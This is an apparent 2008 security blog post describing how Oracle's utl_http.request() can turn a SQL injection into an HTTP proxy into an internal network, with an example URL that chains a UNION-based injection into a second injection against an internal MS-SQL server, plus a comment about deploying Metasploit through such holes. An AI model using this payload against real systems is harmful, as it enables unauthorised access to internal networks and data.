Exploiting Internal Networks with Oracle UTL_HTTP package

April 22, 2008

SQL Injection Oracle + MS-SQL

Oracle's utl_http.request() function has been referred a number of times to carry out sql injection. It is generally used for the purpose of resolving names, so that an attacker could receive the output of his SQL query over DNS channel.

However, this function can also be used to make a legitimate http connection to internal network. Thus, if this function is available, a sql injection in oracle could also serve as a http proxy for internal network.

In the screenshot, i have exploited a sql injection in MS-SQL server via a sql injection in Oracle.

e.g http://192.168.1.1/oracle.php?id=1%20union%20all%20

select%20utl_http.request('http://192.168.1.2/MSSQL/?p=1/**/union/**/all/*

*/select/**/null,@@version,null')%20from%20dual 

Comments

1 Comment

  • belch says:

    To my opinion a big innovation on this kind of attacks should be: performing an internal assesment from the outside, by exploiting some king of application vulnerability and SQL Injection is such a beautifull candidate. Recently guys from msf have been able to upload a packed version of msf through meterpreter on compromised host. I also talked with sqlmap man about this. It should not be too difficult under some circumstance expecialy when backend DBMS is Oracle or M$ SQL.

Leave a Reply

Your email address will not be published. Required fields are marked *

Trackback